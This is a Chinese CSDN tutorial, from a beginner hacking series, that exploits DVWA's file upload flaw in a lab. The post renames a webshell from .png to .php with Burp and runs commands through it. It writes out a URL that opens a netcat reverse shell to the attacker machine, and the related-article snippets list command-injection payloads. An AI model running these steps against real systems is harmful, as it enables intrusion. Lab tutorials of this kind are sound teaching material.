黑客零基础第三章-Web漏洞利用第六节-文件上传漏洞分析利用

最新推荐文章于 2023-05-21 22:11:19 发布
最新推荐文章于 2023-05-21 22:11:19 发布
阅读量3k 收藏 1
点赞数 1
分类专栏: 零基础黑客训练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43879344/article/details/119746991
版权

本节讲述了DVWA的文件上传漏洞,演示利用文件上传入侵靶机。

目录

1.场景

2.DVWA 文件上传漏洞简介

3.DVWA 文件上传漏洞利用

4.总结

1.场景


虚拟机:vmware

攻击主机:kali

IP:192.168.239.142

靶机:Windows10

IP:192.168.239.1

服务:xampp启动的DVWA


2.DVWA 文件上传漏洞简介

文件上传漏洞界面是一处图片上传,

这次我们使用medium安全级别(因为low级别的实在是太简单),代码如下,

代码审计后,发现只能上传格式为jpeg和png类型图片,且size不能大于10000。

3.DVWA 文件上传漏洞利用

准备一个一句话木马文件,后缀为.png。

 

 上传文件,并使用burp截获,

使用burp把文件shell.png改为shell.php,

上传成功,并且界面还显示了上传路径。

浏览器输入http://192.168.239.1/DVWA/hackable/uploads/shell.php?cmd=whoami测试上传的一句话木马。命令执行成功,显示了靶机主机名。

在kali上开启nc,浏览器执行URL

 http://192.168.239.1/DVWA/hackable/uploads/shell.php?cmd=nc64.exe -e cmd.exe 192.168.239.142 4444

获取靶机的shell。

 

4.总结

文件上传漏洞的利用需要注意的是,必须知道上传后的路径。如果上传一个木马后无法获得路径,那么也不可能触发从而进行利用。

第七感小宇宙
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA】--- 二、命令执行(Command Injection)
qq_43168364的博客
05-31 473
Command Injection 在做命令执行时我们要首先了解一下常见的连接符 A;B — A先执行B后执行(Linux和windows下都一样)。 A&B — 简单拼接A,B之间无制约关系(Linux和windows下都一样)。 A|B — Linux中:A的执行结果作为B的输入。Windows中:只执行B。 A&&B — A成功执行之后才会执行B(Linux和wi......
DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]
King_Ho的博客
12-21 2702
MSF攻击Windows实验: 方法一 :通过web站点,使用无文件的方式攻击利用执行 方法二:通过web站点,上传webshell, 返回给msf 方法三:攻击其他端口服务,拿到meterpreter 信息收集-Nmap端口扫描 信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p
DVWA通关攻略之命令注入
勿山几已
05-06 2044
简要介绍命令注入漏洞,演示手工和burp爆破挖掘命令注入漏洞/RCE
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用
tmzy1的博客
03-24 3475
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用
web安全】——文件上传漏洞
Demo不是emo的博客
01-14 9080
文件上传是什么漏洞?让我带你看看吧
WEB漏洞扫描器-AWVS 2020年4月最新版acunetix_14.7.220401065
04-18
量身定制的Web安全设备往往不够测试出一些还未发现的漏洞,因此容易成为黑客攻击目标。 Acunetix -在全世界范围内领先的网络应用安全设备 Acunetix开创了网络应用安全扫描技术:它的工程师们潜心研究网络安全。早...
Seay-Svn源代码泄露漏洞利用工具1.0+2.0.zip
03-24
但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,黑客可以借助其中包含的用于版本信息追踪的‘entries’文件,逐步摸清站点...
网络安全培训视频教程-56.利用上传漏洞Webshell入侵实例演示(.rar
07-16
而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时也出现了许多简明的网络攻击教程,使一些不怀好意的人可以使用“黑客工具”,对个人PC及Web站点进行简单入侵。应与此情况,黑客动画吧积极配合互联网安全...
网络安全培训视频教程-57.利用上传漏洞Webshell入侵实例演示(.rar
07-09
而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时也出现了许多简明的网络攻击教程,使一些不怀好意的人可以使用“黑客工具”,对个人PC及Web站点进行简单入侵。应与此情况,黑客动画吧积极配合互联网安全...
文件上传漏洞
m0_70683009的博客
05-21 1108
如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
DVWA-命令执行漏洞
Darklord.W
04-09 895
低 没有进行任何过滤,可以直接在后面拼接命令 127.0.0.1&&ipconfig 127.0.0.1&&whoami 中 可见过滤了&&和; 127.0.0.1&ipconfig 127.0.0.1|dir 高 可见过滤了一系列字符,但是"|"中有一个空格,可以借此绕过 127.0.0.1|ip...
文件上传漏洞(一句话木马)-学习笔记
小龙在线
08-21 1万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
实验七 文件上传漏洞
Sum
06-02 1559
实验七 文件上传漏洞 一、原理: 一些web应用程序中允许上传图片,文本或者其他资源到指定的位置。 文件上传漏洞就是利用网页代码中的文件上传路径变量过滤不严将可执行的文件上传到一个到服务器中,再通过URL去访问以执行恶意代码。 二、检测绕过: 1、网页有javascript代码,校验上传文件的后缀名,可通过禁用js或修改后缀名饶过。 2、服务器端对文件的MIME类型校验,通过bp修改类型进行绕过。 —客户端js检测绕过 【实验目的】 绕过JavaScript验证检测,上传一句话木马。 【知识点】 Burp
文件上传漏洞靶场:upload-labs安装+第一关教程(一)
热门推荐
北风
12-04 2万+
注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!记录一下自己的学习过程,大佬勿喷!! 一、简介 upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。 二、安装 upload-labs 由于upload-labs 是一个由php 语言编写的靶场,因此需要...
漏洞利用文件上传漏洞详细解析
weixin_44023442的博客
01-22 2509
参考文章 文件上传漏洞攻击与防范方法 Web渗透之文件上传漏洞总结 内部常见的文件上传的检测方式与绕过方法 BookFresh棘手文件上传绕过RCE 文件上传 之 条件竞争 Tag: #文件上传 一、漏洞介绍 文件上传漏洞web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。 二、漏洞原理 程序员在开发任意文件上传功能时,并未考虑文件格式后缀的合
漏洞靶场——DVWA+命令执行漏洞
woo233的博客
08-07 3011
DVWA是OWASP官方编写的PHP网站,包含了各种网站常见漏洞
黑客小白进阶之路——文件上传之一句话木马
Hacker_by_V的博客
08-27 1178
一句话木马原理 什么是一句话木马? Webshell:webshell就是以网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门,顾名思义,web的含义是显然需要服务器开放web服务,shell的含义是取得对服务器某种程度上的操作权限。 Webshell通常被叫做入侵者通过网站端口对网站服务器的某种程度上操作的权限,由于webshell大多数是以动态脚本的形式出现,也有人称之为网站的后门工具,一句话木马、大马、小马都可以叫webshell。 而我们的一句话木马只需要一行代码的木马,短短的一行代码
简学-文件上传漏洞
码农米格的博客
03-22 225
文件上传漏洞0x00 文件上传漏洞的相关概念0x01 一句话木马的原理及利用0x02 中国菜刀的使用0x03 文件上传的绕过姿势JavaScript校验MIME类型校验:拓展名校验:解析漏洞文件头检测绕过0x04 文件上传漏洞的防御手段 针对文件上传漏洞的学习。 实验平台采用的是 bWAPP 0x00 文件上传漏洞的相关概念 文件上传功能:是大部分 WEB 应用必被的功能,网站允许用户自行上传头像、一些社交类网站允许用户上传照片、一些服务类网站需要用户上传证明材料的电子档、电商类网站允许用户上传图
近日,黑客利用海康威视综合安防平台存在的任意文件上传漏洞投放“tellyoupass”勒
最新发布
12-22
近日,有黑客发现了海康威视综合安防平台存在的任意文件上传漏洞利用这一漏洞投放了名为“tellyoupass”的勒索软件。这一严重的安全漏洞使得黑客可以任意上传恶意文件到系统中,从而对海康威视综合安防平台进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值